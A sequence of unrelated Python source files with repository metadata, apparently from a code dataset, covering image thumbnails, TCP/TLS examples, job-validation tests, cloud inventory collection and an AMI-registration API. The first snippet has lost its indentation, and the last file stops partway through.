matcharr=np.zeros([n1,allow],dtype='i8')
matcharr.fill(-1)
ind=np.arange(n2,dtype='i8')
sor=t2.argsort()
t2s=t2[sor]
s2s=s2[sor]
ind=ind[sor]
runi=0
endt=t2s[n2-1]
for i in range(n1):
t=t1[i]
tm=t-ep
tp=t+ep
in1=_binary_search(t2s,tm) # I can improve this?
if in1 == -1:
if (tm < endt) : in1=0
if in1 != -1:
in1=in1+1
in2=in1-1
jj=in2+1
while (jj < n2):
if (t2s[in2+1] < tp):
in2+=1
jj+=1
else :
jj=n2
if (n2 == 1) :
in2=0 # hmmm
if (in1 <= in2):
if (n2 != 1) :
check = s2s[in1:in2+1]
tcheck = t2s[in1:in2+1]
else :
check = s2s[0]
tcheck=t2s[0]
s=s1[i]
t=t1[i]
offby=abs(check-s)
toffby=abs(tcheck-t)
good=np.where(np.logical_and(offby < ep,toffby < ep))[0]+in1
ngood=good.size
if (ngood != 0) :
if (ngood > allow) :
offby=offby[good-in1]
toffby=toffby[good-in1]
dist=np.sqrt(offby**2+toffby**2)
good=good[dist.argsort()]
ngood=allow
good=good[0:ngood]
matcharr[i,0:ngood]=good
runi=runi+ngood
if verbose:
print("total put in bytarr:",runi)
#matches=np.where(matcharr != -1)[0]
matches=np.where(matcharr != -1)
#if (matches.size == 0):
if (matches[0].size == 0):
if verbose:
print("no matches found")
m1=np.array([])
m2=np.array([])
return m1,m2
m1 = matches[0] % n1
m2 = matcharr[matches]
m2 = ind[m2].flatten()
if verbose:
print(m1.size,' matches')
return m1,m2
def _binary_search(arr,x,edgedefault=False,round=False):
n=arr.size
if (x < arr[0]) or (x > arr[n-1]):
if (edgedefault):
if (x < arr[0]): index = 0
elif (x > arr[n-1]): index = n-1
else: index = -1
return index
down=-1
up=n
while (up-down) > 1:
mid=down+(up-down)//2
if x >= arr[mid]:
down=mid
else:
up=mid
index=down
if (round) and (index != n-1):
if (abs(x-arr[index]) >= abs(x-arr[index+1])): index=index+1
return index
| 23.680556
| 96
| 0.523167
| 918
| 6,820
| 3.813725
| 0.293028
| 0.011997
| 0.010283
| 0.007998
| 0.050843
| 0.037704
| 0.015424
| 0
| 0
| 0
| 0
| 0.03636
| 0.350733
| 6,820
| 287
| 97
| 23.763066
| 0.754291
| 0.151906
| 0
| 0.078212
| 0
| 0
| 0.057266
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061453
| false
| 0
| 0.027933
| 0
| 0.150838
| 0.027933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b16b8f307524cf047b1b8450582a6ea17185b4
| 1,470
|
py
|
Python
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 97
|
2019-05-07T15:43:30.000Z
|
2022-03-30T01:43:47.000Z
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 7
|
2020-05-05T17:12:08.000Z
|
2022-03-11T23:41:25.000Z
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 29
|
2019-05-30T22:23:25.000Z
|
2022-02-24T15:13:51.000Z
|
import pandas as pd
from PIL import Image
import requests
from io import BytesIO
import os
import math
df = pd.read_csv('C:\\Users\\v-ngdian\\Documents\\utilities\\thumbnail creator\\MetArtworksAugmented.csv')
size = 512, 512
ids = []
def make_thumbnail(objectID, url, foldername):
try:
response = requests.get(url)
image = Image.open(BytesIO(response.content))
ids.append(objectID)
image.thumbnail(size, Image.ANTIALIAS)
filepath = os.path.dirname(os.path.abspath(__file__))
filepath = os.path.join(filepath, foldername, str(objectID) + '.jpg')
image.save(filepath, "JPEG")
except Exception as e:
print("Invalid URL: {}".format(url))
return
def run(category, foldername):
df_filtered = df[df['Object Name'] == category]
print("There are {} objects in ".format(df_filtered.shape[0]) + category)
counter = -1
for index, row in df_filtered.iterrows():
counter += 1
objectID = row['Object ID']
url = row['PrimaryImageUrl']
if counter%50==0:
print("Working on object: " + str(counter) + " with id: " + str(objectID))
if isinstance(url, float) and math.isnan(url):
next
elif not isinstance(objectID, int):
print("Object id: {} not an integer".format(objectID))
next
else:
make_thumbnail(objectID, url, foldername)
run("vase", "vases")
print(ids)
| 29.4
| 106
| 0.622449
| 180
| 1,470
| 5.027778
| 0.516667
| 0.01989
| 0.046409
| 0.053039
| 0.075138
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01087
| 0.24898
| 1,470
| 50
| 107
| 29.4
| 0.808877
| 0
| 0
| 0.05
| 0
| 0
| 0.159075
| 0.057784
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.15
| 0
| 0.225
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b207a985e8fc2e2ac54f7ef3b3b97efd0e8a7f
| 1,050
|
py
|
Python
|
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
import ssl
import certifi
from promisedio import loop, ns, promise, timer
async def example1():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_default_certs()
context.load_verify_locations(
cafile=certifi.where(),
capath=None,
cadata=None
)
for x in range(100):
try:
stream = await ns.open_connection(("209.131.162.45", 443), ssl=context, server_hostname="www.verisign.com",
timeout=0.2)
except timer.TimeoutError:
pass
print(stream.getsockname())
print(stream.getpeername())
await stream.write(b"GET / HTTP 1.1\n\n")
print(await stream.read())
await stream.shutdown()
async def example2():
stream = await ns.open_connection(("192.168.1.99", 8080), timeout=2)
print(stream.getsockname())
print(stream.getpeername())
await stream.shutdown()
promise.exec_async(example1())
loop.run_forever()
| 26.25
| 119
| 0.648571
| 130
| 1,050
| 5.130769
| 0.592308
| 0.065967
| 0.038981
| 0.050975
| 0.245877
| 0.164918
| 0.164918
| 0.164918
| 0
| 0
| 0
| 0.047205
| 0.233333
| 1,050
| 39
| 120
| 26.923077
| 0.781366
| 0
| 0
| 0.193548
| 0
| 0
| 0.057143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.032258
| 0.096774
| 0
| 0.096774
| 0.16129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2d9cf0513bac35f38ddd5680c08dee820e7ca
| 3,232
|
py
|
Python
|
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | 1
|
2016-04-13T17:07:05.000Z
|
2016-04-13T17:07:05.000Z
|
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sahara.service.validations.edp import job as j
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
class TestJobValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobValidation, self).setUp()
self._create_object_fun = j.check_mains_libs
self.scheme = j.JOB_SCHEMA
def test_empty_libs(self):
for job_type in [edp.JOB_TYPE_MAPREDUCE, edp.JOB_TYPE_JAVA]:
self._assert_create_object_validation(
data={
"name": "jar.jar",
"type": job_type
},
bad_req_i=(1, "INVALID_DATA",
"%s flow requires libs" % job_type))
self._assert_create_object_validation(
data={
"name": "jar.jar",
"type": edp.JOB_TYPE_MAPREDUCE_STREAMING,
})
def test_mains_unused(self):
for job_type in [edp.JOB_TYPE_MAPREDUCE, edp.JOB_TYPE_JAVA]:
self._assert_create_object_validation(
data={
"name": "jar.jar",
"type": job_type,
"mains": ["lib1"],
"libs": ["lib2"]
},
bad_req_i=(1, "INVALID_DATA",
"%s flow does not use mains" % job_type))
def test_empty_pig_mains(self):
data = {
"name": "pig.pig",
"type": edp.JOB_TYPE_PIG,
"libs": ['lib-uuid']
}
self._assert_create_object_validation(
data=data, bad_req_i=(1, "INVALID_DATA",
"Pig flow requires main script"))
data.update({"type": edp.JOB_TYPE_HIVE})
self._assert_create_object_validation(
data=data, bad_req_i=(1, "INVALID_DATA",
"Hive flow requires main script"))
def test_overlap_libs(self):
for job_type in [edp.JOB_TYPE_HIVE, edp.JOB_TYPE_PIG]:
self._assert_create_object_validation(
data={
"name": "jar.jar",
"type": job_type,
"libs": ["lib1", "lib2"],
"mains": ["lib1"]
},
bad_req_i=(1, "INVALID_DATA", "'mains' and 'libs' overlap"))
def test_jar_rejected(self):
self._assert_create_object_validation(
data={
"name": "jar.jar",
"type": "Jar",
},
bad_req_i=(1, "VALIDATION_ERROR",
"'Jar' is not one of " + str(edp.JOB_TYPES_ALL)))
| 35.130435
| 76
| 0.552599
| 379
| 3,232
| 4.469657
| 0.337731
| 0.070248
| 0.053129
| 0.090909
| 0.347107
| 0.347107
| 0.335891
| 0.335891
| 0.307556
| 0.287485
| 0
| 0.008958
| 0.34375
| 3,232
| 91
| 77
| 35.516484
| 0.789722
| 0.171101
| 0
| 0.40625
| 0
| 0
| 0.140766
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.09375
| false
| 0
| 0.046875
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2efb0dac87ecec2330f57bb9b5abeb2ef6c62
| 1,705
|
py
|
Python
|
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | null | null | null |
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | null | null | null |
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | 2
|
2022-02-07T09:05:54.000Z
|
2022-03-17T04:32:50.000Z
|
# Copyright (c) 2020 Intel Corporation.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""EII Message Bus Azure Edge Runtime Bridge
"""
import asyncio
import traceback as tb
from eab.bridge_state import BridgeState
def main():
"""Main method.
"""
bs = None
try:
bs = BridgeState.get_instance()
loop = asyncio.get_event_loop()
loop.run_forever()
except Exception as e:
print(f'[ERROR] {e}\n{tb.format_exc()}')
raise
finally:
if bs is not None:
# Fully stop the bridge
bs.stop()
# Clean up asyncio
loop.stop()
loop.close()
if __name__ == "__main__":
main()
| 34.1
| 78
| 0.70088
| 242
| 1,705
| 4.880165
| 0.570248
| 0.074513
| 0.022015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003042
| 0.228739
| 1,705
| 49
| 79
| 34.795918
| 0.895057
| 0.678592
| 0
| 0
| 0
| 0
| 0.073643
| 0.042636
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2fe433461c1164efd99a7fb0d0c61b5a14512
| 8,033
|
py
|
Python
|
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
import logging
import time
from spaceone.inventory.libs.manager import GoogleCloudManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.bigquery.sql_workspace import SQLWorkspaceConnector
from spaceone.inventory.model.bigquery.sql_workspace.cloud_service import BigQueryWorkSpace, SQLWorkSpaceResource, \
SQLWorkSpaceResponse, ProjectModel
from spaceone.inventory.model.bigquery.sql_workspace.cloud_service_type import CLOUD_SERVICE_TYPES
from datetime import datetime
_LOGGER = logging.getLogger(__name__)
class SQLWorkspaceManager(GoogleCloudManager):
connector_name = 'SQLWorkspaceConnector'
cloud_service_types = CLOUD_SERVICE_TYPES
def collect_cloud_service(self, params):
_LOGGER.debug(f'** Big Query SQL Workspace START **')
start_time = time.time()
"""
Args:
params:
- options
- schema
- secret_data
- filter
- zones
Response:
CloudServiceResponse/ErrorResourceResponse
"""
collected_cloud_services = []
error_responses = []
data_set_id = ""
secret_data = params['secret_data']
project_id = secret_data['project_id']
##################################
# 0. Gather All Related Resources
# List all information through connector
##################################
big_query_conn: SQLWorkspaceConnector = self.locator.get_connector(self.connector_name, **params)
data_sets = big_query_conn.list_dataset()
projects = big_query_conn.list_projects()
update_bq_dt_tables = []
table_schemas = []
for data_set in data_sets:
try:
##################################
# 1. Set Basic Information
##################################
data_refer = data_set.get('datasetReference', {})
data_set_id = data_refer.get('datasetId')
dataset_project_id = data_refer.get('projectId')
bq_dataset = big_query_conn.get_dataset(data_set_id)
creation_time = bq_dataset.get('creationTime', '')
last_modified_time = bq_dataset.get('lastModifiedTime')
region = self._get_region(bq_dataset.get('location', ''))
exp_partition_ms = bq_dataset.get('defaultPartitionExpirationMs')
exp_table_ms = bq_dataset.get('defaultTableExpirationMs')
# skip if dataset id is invisible
if self._get_visible_on_console(data_set_id):
bq_dt_tables = big_query_conn.list_tables(data_set_id)
update_bq_dt_tables, table_schemas = self._get_table_list_with_schema(big_query_conn, bq_dt_tables)
labels = self.convert_labels_format(bq_dataset.get('labels', {}))
##################################
# 2. Make Base Data
##################################
bq_dataset.update({
'name': data_set_id,
'project': project_id,
'tables': update_bq_dt_tables,
'table_schemas': table_schemas,
'region': region,
'visible_on_console': self._get_visible_on_console(data_set_id),
'matching_projects': self._get_matching_project(dataset_project_id, projects),
'creationTime': self._convert_unix_timestamp(creation_time),
'lastModifiedTime': self._convert_unix_timestamp(last_modified_time),
'default_partition_expiration_ms_display': self._convert_milliseconds_to_minutes(exp_partition_ms),
'default_table_expiration_ms_display': self._convert_milliseconds_to_minutes(exp_table_ms),
'labels': labels
})
big_query_data = BigQueryWorkSpace(bq_dataset, strict=False)
##################################
# 3. Make Return Resource
##################################
big_query_work_space_resource = SQLWorkSpaceResource({
'name': data_set_id,
'account': project_id,
'region_code': region,
'tags': labels,
'data': big_query_data,
'reference': ReferenceModel(big_query_data.reference())
})
##################################
# 4. Make Collected Region Code
##################################
self.set_region_code(region)
##################################
# 5. Make Resource Response Object
# List of SQLWorkSpaceResponse Object
##################################
collected_cloud_services.append(SQLWorkSpaceResponse({'resource': big_query_work_space_resource}))
except Exception as e:
_LOGGER.error(f'[collect_cloud_service] => {e}', exc_info=True)
error_response = self.generate_resource_error_response(e, 'BigQuery', 'SQLWorkspace', data_set_id)
error_responses.append(error_response)
_LOGGER.debug(f'** Big Query Finished {time.time() - start_time} Seconds **')
return collected_cloud_services, error_responses
def _get_region(self, location):
matched_info = self.match_region_info(location)
return matched_info.get('region_code') if matched_info else 'global'
def _get_table_list_with_schema(self, big_conn: SQLWorkspaceConnector, bq_dt_tables):
update_bq_dt_tables = []
table_schemas = []
for bq_dt_table in bq_dt_tables:
table_ref = bq_dt_table.get('tableReference')
table_single = big_conn.get_tables(table_ref.get('datasetId'), table_ref.get('tableId'))
if table_single is not None:
creation_time = table_single.get('creationTime')
expiration_time = table_single.get('expirationTime')
last_modified_time = table_single.get('lastModifiedTime')
table_single.update({
'creationTime': self._convert_unix_timestamp(creation_time),
'expirationTime': self._convert_unix_timestamp(expiration_time),
'lastModifiedTime': self._convert_unix_timestamp(last_modified_time)
})
_table_schemas = table_single.get('schema', {})
if _table_schemas != {}:
fields = _table_schemas.get('fields', [])
table_single.update({'schema': fields})
update_bq_dt_tables.append(table_single)
for single_schema in fields:
single_schema.update({'table_id': table_ref.get('tableId')})
table_schemas.append(single_schema)
return update_bq_dt_tables, table_schemas
@staticmethod
def _get_matching_project(project_id, projects):
_projects = []
for project in projects:
if project_id == project.get('id'):
_projects.append(ProjectModel(project, strict=False))
return _projects
@staticmethod
def _get_visible_on_console(dataset_id):
return False if dataset_id.startswith('_') else True
@staticmethod
def _convert_milliseconds_to_minutes(milliseconds):
if milliseconds:
minutes = (int(milliseconds)/1000)/60
return minutes
else:
return None
@staticmethod
def _convert_unix_timestamp(unix_timestamp):
try:
return datetime.fromtimestamp(int(unix_timestamp) / 1000)
except Exception as e:
_LOGGER.error(f'[_convert_unix_timestamp] {e}')
return
| 42.957219
| 119
| 0.578115
| 764
| 8,033
| 5.681937
| 0.215969
| 0.023958
| 0.023036
| 0.022115
| 0.21654
| 0.180604
| 0.152499
| 0.093988
| 0.079244
| 0
| 0
| 0.002833
| 0.2969
| 8,033
| 186
| 120
| 43.188172
| 0.765758
| 0.033362
| 0
| 0.154472
| 0
| 0
| 0.10375
| 0.027488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056911
| false
| 0
| 0.065041
| 0.00813
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b763c3212f1f5ddcadc048b167842b24fdff2e
| 1,732
|
py
|
Python
|
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 26 09:11:06 2016
@author: eikes
"""
import ConfigParser
from components import Component
from result import VariableResult
_config = ConfigParser.ConfigParser()
_config.read('scenario.cfg')
_section = 'MySection'
_results = 'results'
def _create_comp(index):
global _config, _section
connections = map(str.strip, _config.get(
_section,
'comp.{0}.connections'.format(index),
).split(','))
return Component(
_config.get(_section, 'comp.{0}.name'.format(index)),
_config.get(_section, 'comp.{0}.type'.format(index)),
_config.get(_section, 'comp.{0}.reference_values'.format(index)),
connections,
_config.get(_section, 'comp.{0}.replace_values'.format(index)),
_config.getfloat(_section, 'comp.{0}.factor'.format(index)),
)
def _create_results():
global _config, _results
quantity = _config.getint(_results, 'quantity')
results = []
for i in range(1, quantity+1):
label = _config.get(_results, 'result.{0}.name'.format(i))
comp = _config.get(_results, 'result.{0}.comp'.format(i))
calc_type = _config.getint(_results, 'result.{0}.type'.format(i))
results.append(
VariableResult(pk=i, label=label, comp_name=comp, calc_type=calc_type)
)
return results
LP_FILE_PATH = _config.get(_section, 'lp')
TRC_FILE_PATH = _config.get(_section, 'trc')
QUANTITY = _config.getint(_section, 'quantity')
COMPONENTS = [ _create_comp(i) for i in range(1, QUANTITY+1) ]
RESULTS = _create_results()
SIMULATIONS = _config.getint(_section, 'simulations')
WORKER = _config.getint(_section, 'worker')
S_VALUE = float(1.5855e+07)
| 27.0625
| 90
| 0.663972
| 212
| 1,732
| 5.15566
| 0.334906
| 0.074108
| 0.10247
| 0.091491
| 0.240622
| 0.096981
| 0.096981
| 0
| 0
| 0
| 0
| 0.023371
| 0.184758
| 1,732
| 63
| 91
| 27.492063
| 0.750708
| 0.042725
| 0
| 0
| 0
| 0
| 0.134265
| 0.029162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b8a1f71cb2c99f52c326ad6e518a675e652f84
| 466
|
py
|
Python
|
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | 7
|
2018-11-08T11:39:27.000Z
|
2020-09-10T17:50:57.000Z
|
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | null | null | null |
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | 2
|
2019-09-16T14:34:03.000Z
|
2019-10-12T19:24:00.000Z
|
ncoders = int(input("enter no. of coders : "))
l=map(int,input().split(" "))
sl=[]
l = sorted(list(l))
top = 1
for rotator in range(1,ncoders):
sl = l[:rotator]
if(top != ncoders):
if(max(sl) < l[top]):
l[l.index(max(sl))] = 0
top = top +1
elif(max(sl) == l[top]):
l[l.index(max(sl[:len(sl)-1]))] = 0
top = top+1
else:
break
print(l)
print(sum(l))
| 18.64
| 47
| 0.44206
| 69
| 466
| 2.985507
| 0.42029
| 0.058252
| 0.058252
| 0.087379
| 0.203884
| 0.203884
| 0.203884
| 0.203884
| 0.203884
| 0
| 0
| 0.02349
| 0.360515
| 466
| 24
| 48
| 19.416667
| 0.667785
| 0
| 0
| 0.111111
| 0
| 0
| 0.049569
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ba91add5ced077993a147299ed8098ccb69a59
| 8,081
|
py
|
Python
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 77
|
2019-11-14T22:54:48.000Z
|
2022-02-09T06:06:39.000Z
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 47
|
2020-01-15T18:51:32.000Z
|
2022-03-08T19:46:39.000Z
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 50
|
2019-11-14T22:51:28.000Z
|
2022-03-14T22:49:53.000Z
|
######################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
import config
from flask_restful import Resource, reqparse
import logging
from decorators import admin_api, restricted_api, private_api
import botocore
import datetime
from models import db, AmiList
import boto3
import errors
from sqlalchemy import exc
from sqlalchemy.exc import SQLAlchemyError
logger = logging.getLogger("api")
session = boto3.session.Session()
aws_region = session.region_name
ec2_client = boto3.client('ec2', aws_region, config=config.boto_extra_config())
def get_ami_info():
ami_info = {}
for session_info in AmiList.query.filter_by(is_active=True).all():
ami_info[session_info.ami_label] = session_info.ami_id
return ami_info
class ManageImage(Resource):
@admin_api
def post(self):
"""
Register a new EC2 AMI as DCV image on SOCA
---
tags:
- DCV
parameters:
- in: body
name: body
schema:
required:
- os
- ami_id
- ami_label
- root_size
properties:
ami_id:
type: string
description: EC2 ID of the AMI
os:
type: string
description: Windows or Linux
ami_label:
type: string
description: Friendly name for your image
root_size:
type: string
description: Minimum size of your EC2 AMI
responses:
200:
description: Pair of user/token is valid
401:
description: Invalid user/token pair
"""
parser = reqparse.RequestParser()
parser.add_argument('ami_id', type=str, location='form')
parser.add_argument('os', type=str, location='form')
parser.add_argument('ami_label', type=str, location='form')
parser.add_argument('root_size', type=str, location='form')
args = parser.parse_args()
ami_id = args["ami_id"]
ami_label = str(args["ami_label"])
os = args["os"]
if args["os"] is None or args["ami_label"] is None or args["ami_id"] is None or args["root_size"] is None:
return errors.all_errors('CLIENT_MISSING_PARAMETER', "os (str), ami_id (str), ami_label (str) and root_size (str) are required.")
if args["os"].lower() not in ["centos7", "rhel7", "amazonlinux2", "windows"]:
return errors.all_errors('CLIENT_MISSING_PARAMETER', "os must be centos7, rhel7, amazonlinux2, or windows")
try:
root_size = int(args["root_size"])
except ValueError:
return errors.all_errors('IMAGE_REGISTER_ERROR', f"{root_size} must be a valid integer")
soca_labels = get_ami_info()
# Register AMI to SOCA
if ami_label not in soca_labels.keys():
try:
ec2_response = ec2_client.describe_images(ImageIds=[ami_id],
Filters=[{'Name': 'state', 'Values': ['available']}])
if (len(ec2_response["Images"]) != 0):
new_ami = AmiList(ami_id=ami_id,
ami_type=os.lower(),
ami_label=ami_label,
is_active=True,
ami_root_disk_size=root_size,
created_on=datetime.datetime.utcnow())
try:
db.session.add(new_ami)
db.session.commit()
return {"success": True, "message": f"{ami_id} registered successfully in SOCA as {ami_label}"}, 200
except SQLAlchemyError as e:
db.session.rollback()
logger.error(f"Failed Creating AMI {ami_label} {ami_id} {e}")
return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} registration not successful")
else:
logger.error(f"{ami_id} is not available in AWS account")
return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} is not available in AWS account. If you just created it, make sure the state of the image is 'available' on the AWS console")
except botocore.exceptions.ClientError as error:
logger.error(f"Failed Creating AMI {ami_label} {ami_id} {error}")
